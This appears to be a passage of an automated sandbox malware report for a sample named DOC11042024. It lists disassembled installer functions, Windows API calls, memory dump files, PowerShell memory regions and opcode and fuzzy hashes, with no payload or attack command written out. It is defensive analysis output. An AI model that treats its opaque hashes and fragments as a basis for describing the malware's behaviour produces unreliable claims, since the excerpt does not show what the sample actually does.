                                                                              • Opcode Fuzzy Hash: 1447656032315978b1f69cf749e7b3958b60c33623e7124d34fd1eba4ba6eb1c
                                                                              • Instruction Fuzzy Hash: AED0A731106930AAD2227744CC00DDF729CEE45301340043BF140B31B5C7781E418BFD
                                                                              Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                • Part of subcall function 00405DE9: wsprintfW.USER32 ref: 00405DF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                              • String ID:
                                                                              • API String ID: 1404258612-0
                                                                              • Opcode ID: aa5555bfc8295b58fd81a5818e23c2b5cd16578b7fef26a9570da450fab9efcc
                                                                              • Instruction ID: 61e4eed2658209ad14430a75dcf5faad83cf27f194a0033f35d66832804e5a0d
                                                                              • Opcode Fuzzy Hash: aa5555bfc8295b58fd81a5818e23c2b5cd16578b7fef26a9570da450fab9efcc
                                                                              • Instruction Fuzzy Hash: BE113375A00109BFDB00AFA6CD45CAEBBB9EF44344F10807AF501E62A1E7788E50DB68
                                                                              Function 004050CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 004050F9
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040514A
                                                                                • Part of subcall function 0040413D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040414F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                              • Instruction ID: 273a2ce99007f038a8422911e560f0de302714cc733239264dd8afd1c0d4f91e
                                                                              • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                              • Instruction Fuzzy Hash: 1401D471A04608AFDF205F11ED95B5B3A26EB94354F504037FA407A2D1C37A8C529FAD
                                                                              Function 004037E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037B8,75923420,004035E3,?), ref: 004037FB
                                                                              • GlobalFree.KERNEL32(?), ref: 00403802
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004037F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Free$GlobalLibrary
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 1100898210-823278215
                                                                              • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                              • Instruction ID: eb7a70e7b37d2f55339c08f46e83837a64b111aaaf7ecab2a67c60d0eb484288
                                                                              • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                              • Instruction Fuzzy Hash: A5E0C2339150209BC7215F65FD05B1ABBA86F99F22F05403AF9407B7A187746C528BEC
                                                                              Function 00405956 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DBE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040595C
                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DBE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040596C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-1246513382
                                                                              • Opcode ID: e7e50489df4e5da7584ac772c1502a8879f37129e397ca9a8dce42098350be23
                                                                              • Instruction ID: e58451f9e69e7824353387c1b58b690845073fe7f5f6adde8b736a7f09779b80
                                                                              • Opcode Fuzzy Hash: e7e50489df4e5da7584ac772c1502a8879f37129e397ca9a8dce42098350be23
                                                                              • Instruction Fuzzy Hash: 94D05EB3805D20DAD3226B54DC40DAF63ACEF113507494466F540A61A5D3785D818AE9
                                                                              Function 00405A90 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AA0
                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405AB8
                                                                              • CharNextA.USER32(?,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AC9
                                                                              • lstrlenA.KERNEL32(?,?,00000000,00405CAD,00000000,[Rename]), ref: 00405AD2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                              • Instruction ID: 3e22af0af635c07dfb38edcd46c68e5d46adbbbbbb813ad012db41b6cbb26db9
                                                                              • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                              • Instruction Fuzzy Hash: 91F0C231604458AFC7029BA5CD8099FBBA8DF06350B2141A6F801F7210D274EE019FA9

                                                                              Executed Functions

                                                                              Function 0671DE58 Relevance: .7, Instructions: 716COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2328940087.0000000006710000.00000040.00000800.00020000.00000000.sdmp, Offset: 06710000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_6710000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1451b2e35e45fa38ca97841f5f50bd9521c67046b60c3ec604c59bc205959529
                                                                              • Instruction ID: a158fae08b62f3b8d16f3996ef4518b782756b7d84cdc4e1cb08632c8403e061
                                                                              • Opcode Fuzzy Hash: 1451b2e35e45fa38ca97841f5f50bd9521c67046b60c3ec604c59bc205959529
                                                                              • Instruction Fuzzy Hash: B3529234F00319DFDB64DF68C954BADBBB6AF85304F1085AAD80AEB255DB309985CF81
                                                                              Function 07233A50 Relevance: 26.0, Strings: 20, Instructions: 1042COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                              • API String ID: 0-1426913307
                                                                              • Opcode ID: 5536740a893d5ef7618049be193c80fa22cdfa67b52382b9349475496602bd97
                                                                              • Instruction ID: 70200a7ca93c4779b861d60e9dd81821272709d82e6639a325539c77eb349ba6
                                                                              • Opcode Fuzzy Hash: 5536740a893d5ef7618049be193c80fa22cdfa67b52382b9349475496602bd97
                                                                              • Instruction Fuzzy Hash: F392A0B0B10354CFD714DB58C591BAABBB2EB85704F2084A9E9096F392CB72ED45CF91
                                                                              Function 090106F0 Relevance: 19.5, Strings: 15, Instructions: 711COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                              • API String ID: 0-2603203684
                                                                              • Opcode ID: 72ffdc6111556fd312ed1fe5896fca8ee3ce5b4860e6e5049a77d51c8bf0cecc
                                                                              • Instruction ID: 72c862d96001bee437bfe6cafb07c2d5aa4d5f465465e4a7bb08408a5a690681
                                                                              • Opcode Fuzzy Hash: 72ffdc6111556fd312ed1fe5896fca8ee3ce5b4860e6e5049a77d51c8bf0cecc
                                                                              • Instruction Fuzzy Hash: 4342B231B05204CFDB64CF68C551AAEBBF2EF85310F14886AE8859B355DB32DC85CBA1
                                                                              Function 07233A2E Relevance: 13.3, Strings: 10, Instructions: 847COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
                                                                              • API String ID: 0-93237521
                                                                              • Opcode ID: fbb1614c67e0ff4e1fc1359f964489659d4dad7538e6c0aa6ecbc1c5d3ee86c9
                                                                              • Instruction ID: 207fb5e613d369292ddbab35e349cb98234b97d979cca7ff168e8d359ae0c907
                                                                              • Opcode Fuzzy Hash: fbb1614c67e0ff4e1fc1359f964489659d4dad7538e6c0aa6ecbc1c5d3ee86c9
                                                                              • Instruction Fuzzy Hash: 1472A0B0B10344CFDB14DB58C591BAABBB2EB85714F1084A9E9056F392CBB2ED41CF91
                                                                              Function 07233060 Relevance: 13.2, Strings: 10, Instructions: 653COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.xk$-xk
                                                                              • API String ID: 0-4060372604
                                                                              • Opcode ID: 1812257068fec4547638b1029b9a7856b2ae56d6ac311e3df774fa02b511e996
                                                                              • Instruction ID: 70cc5f9e5706eaa17297eb0ea68f971c52a9b21fa8816a199027c18215798f44
                                                                              • Opcode Fuzzy Hash: 1812257068fec4547638b1029b9a7856b2ae56d6ac311e3df774fa02b511e996
                                                                              • Instruction Fuzzy Hash: 2332F6B0B20205DFCB24DB68C651BAEBBA2EF85310F14C869D8019F396DB75DD45CBA1
                                                                              Function 0723C971 Relevance: 9.7, Strings: 7, Instructions: 985COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$x.xk$x.xk$-xk
                                                                              • API String ID: 0-3165302621
                                                                              • Opcode ID: bdebfa4adcd64df74765383bb2824b2acfcc280b1173b8236b0055bb30183ebb
                                                                              • Instruction ID: 04e7333dc9fc8193881b575ae243a732b3653ab9f8d05f979306827f95f69154
                                                                              • Opcode Fuzzy Hash: bdebfa4adcd64df74765383bb2824b2acfcc280b1173b8236b0055bb30183ebb
                                                                              • Instruction Fuzzy Hash: 25926FB0B102158FD764DB58CE51BAABBB2EF85310F5084A4E9096F391CB72ED85CF91
                                                                              Function 07231148 Relevance: 8.1, Strings: 6, Instructions: 599COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq
                                                                              • API String ID: 0-1582633876
                                                                              • Opcode ID: 868552745f932d2b905728122d2ac0539ec70072413b294c5195bc3bd991e0c9
                                                                              • Instruction ID: c6c3be84f9485ff4cc735c02b833c111e9a26dce397723f99c6f03294de71a01
                                                                              • Opcode Fuzzy Hash: 868552745f932d2b905728122d2ac0539ec70072413b294c5195bc3bd991e0c9
                                                                              • Instruction Fuzzy Hash: E532E0B0B202099FD714CB68C545FAABBB2EF85314F14C469E905AF395CB72EC05CB91
                                                                              Function 07230840 Relevance: 6.5, Strings: 5, Instructions: 240COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                              • API String ID: 0-103809679
                                                                              • Opcode ID: 6fd24071e02ce61d140e36f2143ffdc42745f9e708adf5fdac28897c231a4657
                                                                              • Instruction ID: dfd1e770995b86e2c8cf5aaf54d71c8d73a4dbe3febb3427d6f370e415af907f
                                                                              • Opcode Fuzzy Hash: 6fd24071e02ce61d140e36f2143ffdc42745f9e708adf5fdac28897c231a4657
                                                                              • Instruction Fuzzy Hash: 7C7157F1B202168FCB349B7898102AFBBA7EFC1610F14846AD915DB291EA31CA05C7F1
                                                                              Function 07234EE4 Relevance: 5.6, Strings: 4, Instructions: 615COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$x.xk$-xk
                                                                              • API String ID: 0-1925243054
                                                                              • Opcode ID: 378b69c75553998ac510e54b62a8c7b987cb24da41c3ad6b05265356b2a9bfd0
                                                                              • Instruction ID: f97a3fe9ba138d1f8de54f20ef7dd52db52bc06c5d76805fa931afeca3ecdad2
                                                                              • Opcode Fuzzy Hash: 378b69c75553998ac510e54b62a8c7b987cb24da41c3ad6b05265356b2a9bfd0
                                                                              • Instruction Fuzzy Hash: A8429EB0B102159FD720DB68CA50FA9BBB2EB84310F14C495E9099F391DB72ED45CFA1
                                                                              Function 07238318 Relevance: 5.6, Strings: 4, Instructions: 607COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                              • API String ID: 0-4000621977
                                                                              • Opcode ID: 926ab15e8f6d1bce650f239dc56fb7649b8fc7a7a097a0fbffbbf00b229ab4e4
                                                                              • Instruction ID: 5db76e074d6f5ba8d02c84ce602db98afda9dd95445f481adec57a765db15e89
                                                                              • Opcode Fuzzy Hash: 926ab15e8f6d1bce650f239dc56fb7649b8fc7a7a097a0fbffbbf00b229ab4e4
                                                                              • Instruction Fuzzy Hash: B41238F17242168FCB258B68891166BBFA2AFC1311F1484AAE905CF351DB36DD45CBB2
                                                                              Function 07235924 Relevance: 5.5, Strings: 4, Instructions: 487COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$E$x.xk$-xk
                                                                              • API String ID: 0-1939656691
                                                                              • Opcode ID: 16e2b8d0c015393b3b3dd8b273b1ccb315719488143a2fe224129a57309e037d
                                                                              • Instruction ID: 9b142e3b383f7d2e09298bd8b670b844ff7569e4254aa2ffbf30d8acc65b379d
                                                                              • Opcode Fuzzy Hash: 16e2b8d0c015393b3b3dd8b273b1ccb315719488143a2fe224129a57309e037d
                                                                              • Instruction Fuzzy Hash: AB229EB4A102159FD760DB28CA40FA9BBB2FB84714F14C494E9099F391DB72ED85CFA1
                                                                              Function 09012D3A Relevance: 5.1, Strings: 4, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2345303997.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_9010000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$4'jq$$jq$$jq
                                                                              • API String ID: 0-1496060811
                                                                              • Opcode ID: bf44e1811ad410ee0f49dc76532035ff97f181f2c773a64e1d1eee17d5601f83
                                                                              • Instruction ID: d11577504e3e7cc7cfd13efbbaf11581d7c8c9b941075843f20dd5e89c546819
                                                                              • Opcode Fuzzy Hash: bf44e1811ad410ee0f49dc76532035ff97f181f2c773a64e1d1eee17d5601f83
                                                                              • Instruction Fuzzy Hash: 2B215B32B042058FDB699A6CE8511AAF7D6FF95220F108D7FD96687186DB31C81AC352
                                                                              Function 07235812 Relevance: 4.4, Strings: 3, Instructions: 644COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk$-xk
                                                                              • API String ID: 0-2266635699
                                                                              • Opcode ID: 6ddf52a3e9b14c47271e2532bf020aa4f9c3ad7bc5dd5110114aba701e6794f4
                                                                              • Instruction ID: 9365e0dd1fff2e7721e524898108f54437d410400236a46764a8551722d58611
                                                                              • Opcode Fuzzy Hash: 6ddf52a3e9b14c47271e2532bf020aa4f9c3ad7bc5dd5110114aba701e6794f4
                                                                              • Instruction Fuzzy Hash: FC528CB0B102159FD760DB28CA80FA9BBB2EB84710F14C495E9099F391DB72ED85CF91
                                                                              Function 0723D193 Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk$-xk
                                                                              • API String ID: 0-2266635699
                                                                              • Opcode ID: 9079b2313850d3eb4df522e11bb498870de1eda27728ed247d588aef01db2d54
                                                                              • Instruction ID: 4fe4d616dcfcfd077f2c97298150109f7bc677d9a8ebdbd299e4d8ca9feac2ef
                                                                              • Opcode Fuzzy Hash: 9079b2313850d3eb4df522e11bb498870de1eda27728ed247d588aef01db2d54
                                                                              • Instruction Fuzzy Hash: 094261B0B102149FD764DB58CE51FAABBB2EB85310F508494E9096F391CB76ED81CF91
                                                                              Function 0723D27C Relevance: 4.2, Strings: 3, Instructions: 467COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'jq$x.xk$-xk
                                                                              • API String ID: 0-2266635699
                                                                              • Opcode ID: 9f96b6326e521fb62b8bf7040dfc47dcdbb6034cbbbca7f5f64fb44c77fd2aa6
                                                                              • Instruction ID: 87a8d3f0becd089e4b93a294bebecbaee556e1a46e69b0b809dfd24f09d5ebcc
                                                                              • Opcode Fuzzy Hash: 9f96b6326e521fb62b8bf7040dfc47dcdbb6034cbbbca7f5f64fb44c77fd2aa6
                                                                              • Instruction Fuzzy Hash: D61282B0B102149FD764DB58CE91FAABBB2EB85310F508494E9096F391CB76ED81CF91
                                                                              Function 07231020 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2341558354.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_7230000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $jq$$jq$$jq
                                                                              • API String ID: 0-3696375380
